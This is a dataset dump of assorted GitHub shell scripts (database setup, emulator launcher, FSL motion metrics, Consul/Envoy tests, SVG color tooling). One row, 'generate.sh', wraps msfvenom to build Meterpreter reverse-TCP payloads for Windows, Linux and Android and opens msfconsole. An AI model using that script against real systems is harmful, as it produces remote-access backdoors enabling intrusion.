blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
1339dd6ff1cb248bfe4192c03eb394903a56433b | Shell | nculwell/Taskmaster | /server/recreatedb.sh | UTF-8 | 294 | 2.515625 | 3 | [] | no_license | #!/bin/sh
# Sending stdout to /dev/null gets rid of success messages,
# leaving error (and notice) messages to get displayed.
echo Drop and recreate database.
su postgres -c "psql -f dropandcreatedb.sql" || exit 1
echo Create schema.
su nate -c "psql -d taskmaster -f dbsetup.sql" >/dev/null
| true |
56bf8d2edf022aba6ec2166d1a8fa7f1ba97b1e8 | Shell | cvpcs/gentoo-overlay | /games-emulation/epsxe/files/epsxe | UTF-8 | 2,035 | 3.4375 | 3 | [] | no_license | #!/bin/sh
PSEMUDIR=GAMES_LIBDIR/psemu
EPSXEDIR=GAMES_PREFIX_OPT/epsxe
mkdir -p ~/.epsxe
cd ~/.epsxe
cleanlinks
mkdir -p memcards bios cfg cheats snap sstates patches plugins
shopt -s nullglob
for f in `find "${EPSXEDIR}" -maxdepth 1 -type f -printf '%f '` ; do
[[ -e "${f}" ]] && continue
ln -s "${EPSXEDIR}/${f}" "${f}" >& /dev/null
done
if [[ -d "${PSEMUDIR}" ]] ; then
if [[ -d "${PSEMUDIR}/plugins" ]] ; then
for plugin in `find "${PSEMUDIR}/plugins" -maxdepth 1 -type f -printf '%f '` ; do
if [[ ! -e "plugins/${plugin}" ]] ; then
echo "Loading new plugin: ${plugin}"
ln -s "${PSEMUDIR}/plugins/${plugin}" "plugins/${plugin}"
fi
done
fi
if [[ -d "${PSEMUDIR}/cfg" ]] ; then
for configlib in `find "${PSEMUDIR}/cfg" -maxdepth 1 -iname '*.cfg' -prune -o -type f -printf '%f '`; do
if [[ ! -e "cfg/${configlib}" ]] ; then
echo "Loading config utility: ${configlib}"
ln -s "${PSEMUDIR}/cfg/${configlib}" "cfg/${configlib}"
fi
done
for config in `find "${PSEMUDIR}/cfg" -maxdepth 1 -iname '*.cfg' -type f -printf '%f '`; do
if [[ ! -e "cfg/${config}" ]] ; then
echo "Loading default config: ${config}"
cp "${PSEMUDIR}/cfg/${config}" "cfg/${config}"
fi
done
fi
if [[ -d "${PSEMUDIR}/cheats" ]] ; then
for cheat in `find "${PSEMUDIR}/cheats" -maxdepth 1 -type f -printf '%f '`; do
if [[ ! -e "cheats/${cheat}" ]] ; then
ln -s "${PSEMUDIR}/cheats/${cheat}" "cheats/${cheat}"
fi
done
fi
if [[ -d "${PSEMUDIR}/bios" ]] ; then
for bios in `find "${PSEMUDIR}/bios" -maxdepth 1 -type f -printf '%f '`; do
if [[ ! -e "bios/${bios}" ]] ; then
ln -s "${PSEMUDIR}/bios/${bios}" "bios/${bios}"
fi
done
fi
fi
# check for bios
if [[ -z "`cd bios && ls`" ]] ; then
# if the bios directory is empty, then ... well ...
echo
echo "*** Put your BIOS file into ~/.epsxe/bios/"
echo " or ePSXe may not work!"
echo
fi
# execute program (with args)
export LD_PRELOAD="libpthread.so.0:${LD_PRELOAD}" # fix for Bug #26121
exec ./epsxe "$@"
| true |
810b5eb7d82153a5118d4da01f9ab486d6af252d | Shell | Honga1/discriminator | /src/chapters/chapter3/Part2Screen3/audio/convert.sh | UTF-8 | 182 | 3.03125 | 3 | [] | no_license | for i in *.mp3;
do name=$(echo "$i" | cut -d'.' -f1)
echo "$name"
ffmpeg -i "$i" -c:a libopus -b:a 128k "${name}.caf"
ffmpeg -i "$i" -c:a libopus -b:a 128k "${name}.ogg"
done | true |
53c5591a2e99cbbdf92f9d36c1b4e434e46497bb | Shell | AhmedSakrr/marla-server | /src/feed.sh | UTF-8 | 175 | 2.609375 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
echo -en "GET / HTTP/1.1\r\n"
echo -en "Host: localhost:$port\r\n"
echo -en "\r\n"
IFS='
'
read statusline
while true; do
read line
echo $line>>REP
done
| true |
9597d815930eadcea1989ef2b3016878e65209e7 | Shell | jeffduda/brain-behavior-change-processing | /Reconstruction/ME_rmsdiff.sh | UTF-8 | 1,569 | 3.640625 | 4 | [] | no_license | #!/bin/bash
# ---------------------------------------------------------------
# ME_RMSDIFF
#
# Use FSL's rmsdiff command to compute motion metrics on a list of xform matrices
#
# Created: M Elliott 8/2012
# ---------------------------------------------------------------
Usage() {
echo ""
echo "Usage: `basename $0` <outfile_root> <refvol> matfile1 matfile2 ... matfileN"
echo ""
exit 1
}
if [ $# -lt 4 ]; then
Usage
fi
outroot=$1
absfile=${outroot}_abs.rms
relfile=${outroot}_rel.rms
absmean=${outroot}_abs_mean.rms
relmean=${outroot}_rel_mean.rms
refvol=$2
shift
shift
ident_matrix=ident_mat_${RANDOM}.txt
cat << 'EOF' > $ident_matrix
1.000000 0.000000 0.000000 0.000000
0.000000 1.000000 0.000000 0.000000
0.000000 0.000000 1.000000 0.000000
0.000000 0.000000 0.000000 1.000000
EOF
# compute abs and rel RMS metrics from matrices
rm -f $absfile $relfile
last_mat=$ident_matrix
count=0
for matfile in $@ ; do
echo -n "."
# compute absolute RMS displacement from reference volume
${FSLDIR}/bin/rmsdiff $ident_matrix $matfile $refvol >> $absfile
# compute relative RMS displacement from previous volume
if [ $count -gt "0" ] ; then
${FSLDIR}/bin/rmsdiff $last_mat $matfile $refvol >> $relfile
fi
let count=$count+1
last_mat=$matfile
done
# compute means of abs and rel
nvols=`cat $absfile | wc -l`
abssum=`1dsum $absfile`
relsum=`1dsum $relfile`
echo "scale=6 ; $abssum/$nvols" | bc > $absmean
echo "scale=6 ; $relsum/($nvols-1)" | bc > $relmean
# clean up
echo ""
rm -f $ident_matrix
exit 0
| true |
c2b3eceb306f11b2fac34db4ffe139e50f29ad4c | Shell | louismeunier/statistics | /scripts/generate_all_statistics.sh | UTF-8 | 326 | 2.71875 | 3 | [] | no_license | #!/bin/bash
# server must be running
port=${STATISTICS_PORT:-8080}
# Download db export
./scripts/get_db_export.sh
echo "Deleting existing statistics"
curl -X DELETE "http://localhost:${port}/statistics" -H "accept: */*"
# Sql stats
./scripts/generate_sql_statistics.sh
# Python
./scripts/generate_python_statistics.sh
| true |
01164a0f64f3842870674b99df3d6414e2bb9159 | Shell | nicholasjackson/docker-consul-envoy | /compatibility/test.sh | UTF-8 | 1,489 | 3.25 | 3 | [
"MIT"
] | permissive | #!/bin/bash
echo "Testing Consul Envoy Compatibility"
echo ""
echo "Consul Version | Envoy Version | Routing | Traffic Split"
echo "-------------- | ------------- | ------- | -------------"
#consul_version=("1.8.3" "1.8.2" "1.8.0" "1.7.2")
#envoy_version=("1.15.0" "1.14.4" "1.14.2" "1.13.2" "1.13.1" "1.13.0" "1.12.4" "1.12.3" "1.11.2" "1.10.0")
consul_version=("1.12.2" "1.12.0" "1.11.2" "1.10.7" "1.10.0" "1.9.5" "1.9.3" "1.9.2" "1.8.3" "1.8.2" "1.8.1" "1.8.0" "1.7.4" "1.7.3" "1.7.2")
envoy_version=("1.22.2" "1.22.1" "1.22.0" "1.21.2" "1.20.1" "1.18.1" "1.18.4" "1.18.3" "1.17.1" "1.16.2" "1.16.0" "1.15.3" "1.15.0" "1.14.4" "1.14.2" "1.13.4" "1.13.2" "1.13.1" "1.13.0" "1.12.6" "1.12.4" "1.12.3" "1.11.2" "1.10.0")
#consul_version=("1.8.2")
#envoy_version=("1.13.0")
for c in ${consul_version[@]};do
for e in ${envoy_version[@]};do
ENVOY_VERSION=$e CONSUL_VERSION=$c shipyard run ./consul-docker > /dev/null 2>&1
routing=FAIL
splitting=FAIL
for i in {1..30}; do
$(curl -s localhost:9090 -H "x-version:2" | grep -q "Backend_Service 2")
if [ $? == 0 ]; then
routing=PASS
fi
$(curl -s localhost:9090 | grep -q "Backend_Service 1")
if [ $? == 0 ]; then
splitting=PASS
fi
if [[ "${routing}" == "PASS" && "$splitting" == "PASS" ]]; then
break
fi
sleep 1
done
printf "%14s | %13s | %7s | %13s\n" $c $e $routing $splitting
shipyard destroy > /dev/null 2>&1
done
done;
| true |
9056e99ac42b94e533b2d73f21fb8da24231df70 | Shell | Goutham-hub605/payload-generator | /generate.sh | UTF-8 | 998 | 2.984375 | 3 | [
"MIT"
] | permissive | #!/bin/bash
echo " only for educational purpose"
echo "(1) windows payload"
echo "(2) linux payload"
echo "(3)android payload"
echo ""
read -p "Enter you number: " pay
echo ""
echo""
echo "Pls wait"
if [ $pay == 1 ]
then
echo "Creating payload for windows"
read -p "Enter your lhost: " s
read -p "Enter your lport: " s1
read -p "Enter you payload name: " z
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$s LPORT=$s1 -f exe -o $z.exe
elif [ $pay == 2 ]
then
read -p "Enter your lhost: " s
read -p "Enter your lport: " s1
read -p "Enter you payload name: " z
msfvenom -p linux/meterpreter/reverse_tcp LHOST=$s LPORT=$s1 -f elf -o $z.elf
echo ""
else
read -p "Enter your lhost: " s
read -p "Enter your lport: " s1
read -p "Enter you payload name: " z
msfvenom -p android/meterpreter/reverse_tcp LHOST=$s LPORT=$s1 -f raw -o $z.apk
echo "thank you for using"
fi
read -p "Do you want start listener(yes,no)" a
if [ $a == yes ]
then
msfconsole
else
echo ""
echo "thanks for using"
fi
| true |
ca81df7233bfb61e144d2df81819c1ffd7da43c8 | Shell | thamjieying/ShellScriptTutorial | /lesson23.sh | UTF-8 | 292 | 3.59375 | 4 | [] | no_license | #! /bin/bash
# Functions
# function name(){
# command1
# }
# name (){
# command1
# }
function print(){
echo $@ # all the arguments
echo $1 # first argument
echo $2 # secont argument
}
quit(){
echo "quitting"
exit
}
print "hello" "foo"
quit
echo "This should not be called" | true |
e398b62630e0b1a810f58eaec76b588d4f214b4a | Shell | ashish456747/shell-scripting | /variables.sh | UTF-8 | 185 | 2.859375 | 3 | [
"MIT"
] | permissive | #! /bin/bash
#SYSTEM VARIABLES
echo $BASH
echo The bash version is $BASH_VERSION
echo $PWD
echo $HOME
#USER DEFINED VARIABLES
name=MARK
age=10
echo The name is $name and age is $age
| true |
888477c3d9c6fe2f24a4f9a7a8b76badedbf5e1b | Shell | mi11km/setup-isucon-aws-env | /terraform/setup.sh | UTF-8 | 988 | 3.421875 | 3 | [] | no_license | #!/bin/bash
webhook_url= # todo set discord webhook url
ssh_key_name=id_rsa_ec2
number_of_server=4
username=ubuntu
send_ip() {
ip=($(terraform apply -auto-approve -var "ami_id=$1" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | tail -${number_of_server} | tr '\n' ' '))
# send ssh connect command to discord channel
# shellcheck disable=SC2068
for i in ${ip[@]}; do
curl -X POST \
-H "Content-Type: application/json" \
-d '{"username": "ip addressだよー", "content": "ssh -i '${ssh_key_name}' '${username}'@'$i'"}' \
${webhook_url}
echo "ssh -i $ssh_key_name $username@$i"
done
echo "sudo -i -u isucon"
}
ssh-keygen -t rsa -f $ssh_key_name
terraform init
terraform fmt
terraform validate
if [ $# -ne 1 ]; then
send_ip ami-03bbe60df80bdccc0
else
send_ip $1
fi
# send ssh secret key to discord channel
curl -F 'payload_json={"content": "洩らしちゃだめよ"}' \
-F "file1=@${ssh_key_name}" \
${webhook_url}
| true |
70b891c7ff212eaffbef2b52d82b1c998fe5c52b | Shell | supreet-s8/SPRINT | /Contact_US/Contact_US.sh | UTF-8 | 2,217 | 2.78125 | 3 | [] | no_license | #!/bin/sh
##Script will fetch mail from rubix database Descending Order.
#CNT_1=`ssh -q root@10.23.80.136 "java -jar /opt/tms/nae-spw/WEB-INF/lib/sqltool-2.2.9.3.jar --driver=org.hsqldb.jdbcDriver --sql='SELECT * FROM CONTACTUS ORDER BY ID DESC;' rubix "|sed 1d|sed 1d |awk '{print $1}'|head -1`
CNT_1=`ssh -q root@10.23.80.136 "java -jar /opt/tms/nae-spw/WEB-INF/lib/sqltool-2.2.9.3.jar --driver=org.hsqldb.jdbcDriver --sql='SELECT * FROM CONTACTUS ORDER BY ID DESC;' rubix "|sed 1d|sed 1d |awk '{print $1}'| head -1`
CNT_2=`cat /data/offshore_support/Contact_US/CONTACTUS.txt | head -1`
echo $CNT_2
if [ $CNT_1 -ne $CNT_2 ]
then
CNT=`ssh -q root@10.23.80.136 "java -jar /opt/tms/nae-spw/WEB-INF/lib/sqltool-2.2.9.3.jar --driver=org.hsqldb.jdbcDriver --sql='SELECT * FROM CONTACTUS WHERE ID >'$CNT_2' ORDER BY ID DESC;' rubix "|sed 1d|sed 1d |awk '{print $1}'`
echo "$CNT" > /data/offshore_support/Contact_US/CONTACTUS.txt
for i in `cat /data/offshore_support/Contact_US/CONTACTUS.txt`
do
ssh -q root@10.23.80.136 "java -jar /opt/tms/nae-spw/WEB-INF/lib/sqltool-2.2.9.3.jar --driver=org.hsqldb.jdbcDriver --sql='SELECT * FROM CONTACTUS WHERE ID ='$i' ORDER BY ID DESC;' rubix " >/data/offshore_support/Contact_US/mail.txt
USR=`cat /data/offshore_support/Contact_US/mail.txt |sed 1d|sed 1d |awk '{print $4}'`
echo "$USR"
USR1=`ssh -q root@10.23.80.136 "java -jar /opt/tms/nae-spw/WEB-INF/lib/sqltool-2.2.9.3.jar --driver=org.hsqldb.jdbcDriver --sql=\"SELECT EMAIL FROM USER WHERE USERNAME = '$USR';\" rubix "`
echo "$i "
echo "$USR1"
SUBJECT=`ssh -q root@10.23.80.136 "java -jar /opt/tms/nae-spw/WEB-INF/lib/sqltool-2.2.9.3.jar --driver=org.hsqldb.jdbcDriver --sql='SELECT SUBJECT FROM CONTACTUS WHERE ID ='$i';' rubix "`
BODY=`ssh -q root@10.23.80.136 "java -jar /opt/tms/nae-spw/WEB-INF/lib/sqltool-2.2.9.3.jar --driver=org.hsqldb.jdbcDriver --sql='SELECT BODY FROM CONTACTUS WHERE ID ='$i';' rubix "`
echo "$BODY" > /data/offshore_support/Contact_US/mail.txt
cat /data/offshore_support/Contact_US/mail.txt |tr -d \\r |mail -s "$SUBJECT" -b kevin.keschinger@guavus.com -b samuel.joseph@guavus.com -b erik.maxwell@guavus.com -b mohsin.ali@guavus.com -r "$USR1" NAE_UI_SUPPORT@sprint.com
sleep 3
done
else
echo "no New mail"
fi
| true |
1f864630b3e933f1b44c251d98dfb3d42d8cc046 | Shell | loceee/OSXCasperScripts | /cfgScripts/cfgsysAddPrinterAdmin.sh | UTF-8 | 273 | 3 | 3 | [] | no_license | #!/bin/bash
# pass it a domain group, or default to everyone (all user accounts on computers)
# everyone is good for staff / student macs
#
group="${4}"
[ -z "${group}" ] && countycode="everyone"
dseditgroup -o edit -n /Local/Default -a ${group} -t group lpadmin
exit 0
| true |
439ecb55c0744a7aeb98409a2952d85dcbdc63dd | Shell | schlitzered/pylogchop | /contrib/init.d/pylogchop | UTF-8 | 536 | 2.953125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
source /opt/rh/rh-python34/enable
start() {
pylogchop start
}
stop() {
pylogchop quit
}
reload() {
pylogchop reload
}
case "$1" in
start)
start
;;
stop)
stop
;;
reload)
reload
;;
restart)
stop
start
;;
*)
echo "Usage: $0 {start|stop|restart}"
exit 1
;;
esac
exit 0 | true |
7adf86063c17c8e32a126ce5add7534094614a37 | Shell | jhass/PKGBUILDs | /shards-git/PKGBUILD | UTF-8 | 1,002 | 2.75 | 3 | [] | no_license | # Maintainer: Jonne Haß <me@jhass.eu>
pkgname=shards-git
pkgver=v0.17.3.r2.geac9adf
pkgrel=1
pkgdesc="The package manager for the Crystal language (git version)"
arch=('x86_64' 'aarch64')
url="https://github.com/crystal-lang/shards"
license=('Apache')
conflicts=('shards')
provides=('shards')
depends=('libyaml' 'git' 'libevent' 'gc')
optdepends=('fossil')
makedepends=('crystal')
checkdepends=('fossil')
source=("git+https://github.com/crystal-lang/shards.git")
pkgver() {
cd "$srcdir/${pkgname/-git/}"
( set -o pipefail
git describe --long --tags 2>/dev/null | sed 's/\([^-]*-g\)/r\1/;s/-/./g' ||
printf "r%s.%s" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)"
)
}
build() {
cd "${pkgname/-git/}"
make CRYSTAL_OPTS="--release"
}
check() {
cd "${pkgname/-git/}"
./bin/shards install
make test
}
package() {
cd "${pkgname/-git/}"
make install PREFIX="$pkgdir/usr"
install -Dm644 LICENSE "$pkgdir/usr/share/licenses/$pkgname/LICENSE"
}
sha256sums=('SKIP')
| true |
f6cd58197e9b0a5eadfd9edba6c0fcddb7240a91 | Shell | MaritimeResearchInstituteNetherlands/VisTrails | /vistrails/tests/run_on_mac.sh | UTF-8 | 531 | 3.5 | 4 | [
"BSD-3-Clause"
] | permissive | #!/bin/bash
if [ -z "$1" ]
then
echo "usage: $0 <app_path>"
exit 65
fi
APP_PATH=$1
shift
THIS_DIR=`dirname $0`
PYTHON_EXEC_PATH="Contents/MacOS/python"
RESOURCES_PATH="Contents/Resources"
if [ ! -e "$APP_PATH/$RESOURCES_PATH" ]
then
echo "$APP_PATH/$RESOURCES_PATH does not exist"
exit 66
fi
if [ ! -e "$APP_PATH/$PYTHON_EXEC_PATH" ]
then
echo "$APP_PATH/$PYTHON_EXEC_PATH does not exist"
exit 67
fi
PYTHONHOME="$APP_PATH/$RESOURCES_PATH" ${APP_PATH}/${PYTHON_EXEC_PATH} ${THIS_DIR}/runtestsuite.py $@
| true |
4c301b729a6ec835aa264df6f3d96bd6714b7e95 | Shell | akatsos/harokopio-apt-station | /WeatherDir/scripts/delete_audio_maps_passes.sh | UTF-8 | 437 | 2.734375 | 3 | [
"MIT"
] | permissive | #!/bin/bash
#Deletes older than 1 day audio files(wav) ,maps(png) and passes
#Is scheduled to run every Monday and Thursday with a cronjob
#This happens so the RaspPi never runs out of storage space
find /home/pi/WeatherDir/maps -type f -mtime +1 -name '*.png' -delete
find /home/pi/WeatherDir/audio -type f -mtime +1 -name '*.wav' -delete
find /home/pi/WeatherDir/passes -mindepth 1 -maxdepth 1 -type d -mtime +1 -exec rm -rf {} \;
| true |
1a8cb6a9711aeaae607e3402a745d5e60a164ae1 | Shell | shubh0209/Project1 | /script.sh | UTF-8 | 533 | 2.515625 | 3 | [] | no_license | #!/bin/bash
sudo yum update -y
sudo yum install docker -y
sudo systemctl enable docker
sudo systemctl start docker
sudo mkdir -p /nginx
cd /nginx
sudo bash -c "echo 'Hello World, I am nginx server which serves static content, running using docker on ec2 instance managed by terraform and build using jenkins, deployed in CICD pipe
line, triggered by a GIT push to master branch.' > index.html"
sudo docker run -d -p 80:80 -v /nginx/:/usr/share/nginx/html/ --name nginx nginx
sudo docker run -d -p 8080:8080 shubh228/simple-nodejs:v1 | true |
7fd68b1f061f15310b6f719ca13e201a95cfa03a | Shell | fenixdecorare/fenix-brand | /preppng.sh | UTF-8 | 25,463 | 3.09375 | 3 | [] | no_license | #!/bin/bash
PROGNAME=${0##*/}
currentsvgcolors()
{
# Color schema baseado no estudo feito em http://colorschemedesigner.com
# representa as cores actuais nos svg obtidas com -f
# [IMPORTANTE] Altere manualmente after -[ce]? para mudar svgs
# [IMPORTANTE] All svg's have to be passed throught:
# inkscape -l new.svg old.svg (inkscape svg format)
# the inkscape svg format is necessary for this script
# the fill:<color> format is used in this script
# optionaly you can save as plain svg (inkscape gui)
# [IMPORTANTE] svgz em aws precisam content-encoding http header set to gzip
# Numero total de cores no palette fenix (USADO EM TODO SCRIPT)
j=0
j=`expr $j + 1`;vco[$j]="#333333";dco[$j]="cinza" #c1
j=`expr $j + 1`;vco[$j]="#f7f7f7";dco[$j]="white" #c2
j=`expr $j + 1`;vco[$j]="#dc0000";dco[$j]="660000:h+0.000s+0.000l+0.231" #c3
j=`expr $j + 1`;vco[$j]="#a10000";dco[$j]="660000:h+0.000s+0.000l+0.116" #c4
j=`expr $j + 1`;vco[$j]="#660000";dco[$j]="brand-primary" #c5
j=`expr $j + 1`;vco[$j]="#006666";dco[$j]="660000:h+0.500s+0.000l+0.000" #c6
j=`expr $j + 1`;vco[$j]="#999900";dco[$j]="660000:h+0.167s+0.000l+0.100:brand-info" #c7
j=`expr $j + 1`;vco[$j]="#660033";dco[$j]="660000:h+0.917s+0.000l+0.000" #c8
j=`expr $j + 1`;vco[$j]="#330066";dco[$j]="660000:h+0.750s+0.000l+0.000" #c9
j=`expr $j + 1`;vco[$j]="#cc9966";dco[$j]="brand-warning" #c10
j=`expr $j + 1`;vco[$j]="#006633";dco[$j]="brand-success" #c11
j=`expr $j + 1`;vco[$j]="#e45353";dco[$j]="brand-danger" #c12
j=`expr $j + 1`;vco[$j]="#cccccc";dco[$j]="333333:h+0.000s+0.000l+0.600:cinza-logo" #c13
}
setschema()
{
r1="Color::RGB.from_html";r2="puts Color::HSL.from_fraction";rb="ruby -r color -e "
h=".to_hsl.h";s=".to_hsl.s";l=".to_hsl.l"
u="c=$r1('${aco[1]}')"
n=`expr $n + 4`;aco[$n]=`$rb"$u;$r2(c$h+0.000,c$s+0.000,c$l+0.600).html"`
}
setschemafenixs()
{
r1="Color::RGB.from_html";r2="puts Color::HSL.from_fraction";rb="ruby -r color -e "
h=".to_hsl.h";s=".to_hsl.s";l=".to_hsl.l"
u="c=$r1('$c_fenix')"
n=`expr $n - 2`;aco[$n]=`$rb"$u;$r2(c$h+0.000,c$s+0.000,c$l+0.231).html"`
n=`expr $n + 1`;aco[$n]=`$rb"$u;$r2(c$h+0.000,c$s+0.000,c$l+0.116).html"`
n=`expr $n + 1`;aco[$n]="$c_fenix"
n=`expr $n + 1`;aco[$n]=`$rb"$u;$r2(c$h+0.500,c$s+0.000,c$l+0.000).html"`
n=`expr $n + 1`;aco[$n]=`$rb"$u;$r2(c$h+0.167,c$s+0.000,c$l+0.100).html"`
n=`expr $n + 1`;aco[$n]=`$rb"$u;$r2(c$h+0.917,c$s+0.000,c$l+0.000).html"`
n=`expr $n + 1`;aco[$n]=`$rb"$u;$r2(c$h+0.750,c$s+0.000,c$l+0.000).html"`
}
getschema()
{
#u="$u;(o.round(2) == s.round(2)) ? '' : l+'%+.3f' % ((o-s))"
r1="Color::RGB.from_html"
r2="puts Color::HSL.from_fraction"
u=""
u="$u;def fz(o,s,l)"
u="$u;l+'%+.3f' % (o-s)"
u="$u;end"
u="$u;co=$r1('$1');cs=$r1('$2')"
u="$u;puts co.html+':'+cs.html+':j=\`expr \$j + 1\`;vco[\$j]=\"'"
u="$u+co.html+'\";dco[\$j]=\"'+cs.html[1,6]+':'"
u="$u+fz(co.to_hsl.h,cs.to_hsl.h,'h')"
u="$u+fz(co.to_hsl.s,cs.to_hsl.s,'s')"
u="$u+fz(co.to_hsl.l,cs.to_hsl.l,'l')+'\"'"
u="$u;puts co.html+':'+cs.html+':n=\`expr \$n + 1\`;aco[\$n]=\`\$rb\"\$u;\$r2('"
u="$u+'c$'+fz(co.to_hsl.h,cs.to_hsl.h,'h')+','"
u="$u+'c$'+fz(co.to_hsl.s,cs.to_hsl.s,'s')+','"
u="$u+'c$'+fz(co.to_hsl.l,cs.to_hsl.l,'l')+').html\"\`'"
ruby -r color -e "$u"
}
showcoldest()
{
getschema "#`echo $1|cut -d":" -f1`" "#`echo $1|cut -d":" -f2`"
}
arraypalette()
{
a="";n=1;rm -f grep$$
while [ $n -le $j ]
do p=`echo ${vco[$n]}|cut -c2-`
a=",\"$p\"$a"
echo $p >> grep$$
n=`expr $n + 1`
done
a=`echo $a|cut -c2-`
}
similarsvgcolor()
{
k=`fgrep -i fill:# $1|fgrep -ivf grep$$|sed -e 's%.*fill:#\(......\).*%,"\1"%g'|sort -u`
k=`echo $k|cut -c2-|sed -e 's% %%g'`
#u="$u;(o.round(2) == s.round(2)) ? '' : l+'%.0f' % ((o*100)-(s*100))"
#u="$u;(o.round(2) == s.round(2)) ? '' : l+'o%.0f' % (o)+l+'s%.0f' % (s)"
#u="$u;(o.round(2) == s.round(2)) ? '' : l+'s%.2f' % (s)+l+'o%.2f' % (o)"
#u="$u;(o.round(2) == s.round(2)) ? '' : l+'%+.3f' % ((o-s))"
w="Paleta::Color.new(:hex"
z="Color::RGB.from_html("
u=""
u="$u;a=[$a]"
u="$u;k=[$k]"
u="$u;def sc(c,v)"
u="$u;b=v.map { |t| { k: t, sm: $w,t).similarity($w,c)) } }"
u="$u;r=b.reject { |t| t[:sm] > $m }"
u="$u;r.sort { |a,b| a[:sm] <=> b[:sm] }[0]"
u="$u;end"
u="$u;def fz(o,s,l)"
u="$u;l+'%+.3f' % (o-s)"
u="$u;end"
u="$u;f=k.map { |m| r=sc(m,a); { o: m, s: r ? r[:k] : nil, sm: r ? r[:sm] : nil } }"
u="$u;s=f.reject { |m| m[:sm].nil? }"
u="$u;n=f.reject { |m| !m[:sm].nil? }"
u="$u;s.sort! { |a,b| a[:sm] <=> b[:sm] }"
u="$u;s.each { |m| co=${z}m[:o]);cs=${z}m[:s])"
u="$u;puts m[:o]+':'+m[:s]+'|'"
u="$u+fz(co.to_hsl.h,cs.to_hsl.h,'h')"
u="$u+fz(co.to_hsl.s,cs.to_hsl.s,'s')"
u="$u+fz(co.to_hsl.l,cs.to_hsl.l,'l')"
u="$u+'sm%.2f' % m[:sm]"
u="$u }"
u="$u;n.each { |m| puts m[:o]+':'+'nao' }"
q=`ruby -r paleta -r color -e "$u"`
rs=""
rn=""
for u in $q
do if [ -z "`echo $u|fgrep nao`" ];then rs="$rs $u";else rn="$rn $u";fi
done
}
simreport()
{
arraypalette
echo "Similatiry report in $b"
for f in `ls $b`
do similarsvgcolor $b/$f
echo "$f `echo $rs|wc -w` similar, `echo $rn|wc -w` unmatched colors"
done
echo "Similatiry report in $c"
for f in `ls $c`
do similarsvgcolor $c/$f
echo "$f `echo $rs|wc -w` similar, `echo $rn|wc -w` unmatched colors"
done
rm -f grep$$
}
optsvgs()
{
echo "Optimize svgs in $b"
for f in `ls $b`
do ts=`date "+%Y%m%d%H%M%S"`
echo "Processar $f backup saved in $t/s$ts-$f"
cp $b/$f $t/s$ts-$f
inkscape -l $b/$f $t/s$ts-$f
done
echo "Optimize svgs in $c"
for f in `ls $c`
do ts=`date "+%Y%m%d%H%M%S"`
echo "Processar $f backup saved in $t/s$ts-$f"
cp $c/$f $t/s$ts-$f
inkscape -l $c/$f $t/s$ts-$f
done
}
matchscript()
{
arraypalette;similarsvgcolor $1;rm -f grep$$
for u in $rs
do u1=`echo $u|cut -d"|" -f1`
showcoldest $u1
done|sort -t : -k 3.1,3.2 -k 2,2 -k 1,1
}
matchedlist()
{
arraypalette;similarsvgcolor $1;rm -f grep$$
for u in $rs
do u1=`echo $u|cut -d":" -f1`
u2=`echo $u|cut -d":" -f2`
u3=`fgrep -i "fill:#$u1" $1|wc -l`
u4=`echo $u2|cut -d"|" -f1`
u5=`echo $u2|cut -d"|" -f2`
echo "<h1 style=\"background-color:#$u1;color:#$u4\">$u1:$u4:$u5:`printf '%03d' $u3`</h1>"
done
}
unmatchedlist()
{
arraypalette;similarsvgcolor $1;rm -f grep$$
for u in $rn
do u1=`echo $u|cut -d":" -f1`
echo "<h1 style=\"background-color:#$u1;\">$u1</h1>"
done
}
simchange()
{
arraypalette;similarsvgcolor $1;rm -f grep$$
n=0
for u in $rs
do u1=`echo $u|cut -d":" -f1`
u2=`echo $u|cut -d":" -f2|cut -c1-6`
echo "s%fill:#$u1%fill:#$u2%g" >>sed$$
n=`expr $n + 1`
done
if [ $n -gt 0 ]
then echo "$n altercoes de cor"
bn=`basename $1`
sed -f sed$$ $1 >$i/z$$-$bn
cp $1 $i/s`date "+%Y%m%d%H%M%S"`-$bn
mv $i/z$$-$bn $1
else echo "$n similar colors"
fi
echo "`echo $rn|wc -w` unmatched colors"
rm -f sed$$
}
simback()
{
bn=`basename $1`
u=`ls $i/s[0-9][0-9]*-$bn|cut -d"/" -f2|cut -c2-|sort -nr|head -1`
if [ -n "$u" ]
then echo "Recuprar $i/s$u para $1"
cp $i/s$u $1
rm $i/s$u
else echo "Nao existe recuperacao para $1 em $i"
fi
}
valcor()
{
# valida pedidos de alteracao de cores
# $1=cor pedida
# $2=arquivo cor
# $3=descretivo cor
if [ "$1" != "$2" ];then
ta=1 #cor foi alterada
if [ `echo -n "$1"|wc -m` -ne 7 ];then
echo "$3 invalida tamanho<>7 $1"
exit 1
else
rt="puts Color::RGB.from_html('$1')"
vh=`ruby -r color -e "$rt.html"`
if [ `echo -n "$vh"|wc -m` -ne 7 -o $vh != $1 ];then
echo "$3 invalida SET=$1 RGB=$vh"
exit 1
fi
fi
fi
}
valpal()
{
# validar other colors aco[01-02,05,06-08]
n=0
n=`expr $n + 1`;valcor ${aco[$n]} ${vco[$n]} ${dco[$n]}
n=`expr $n + 1`;valcor ${aco[$n]} ${vco[$n]} ${dco[$n]}
n=`expr $n + 3`;valcor $c_fenix ${vco[$n]} ${dco[$n]}
# Obter schema cores calculadas
setschemafenixs
setschema
}
usage()
{
cat << EO
Cria fenix brand logos & images
EO
cat <<EO | column -s\& -t
-h & show this output
-f & show current fill colors for all svgs
-s & show current stroke colors for all svgs
-p & show internal palette
-r & show similarity report
-q & show frontend-variables-skeleton.scss
-e & show frontend-variables-bootstrap.scss
-d & show frontend-fenix-skeleton.scss
-n & show backend.variables.scss
-a & show backend.fenix.scss
-opt & [IMPORTANTE] optimize svgs - deve ser feito antes novos svgs
-o des:ori & show color des values obtained from color ori
-l limit & set limit for similarity (default $m)
-c svg & change similar colors
-m svg & show matched color list (html format)
-t svg & show matched color list (script format)
-u svg & show unmatched color list
-b svg & go back to last change similarity colors
-f1-3 svg & change brand base svgs
-l1-2 svg & change brand compositions svgs
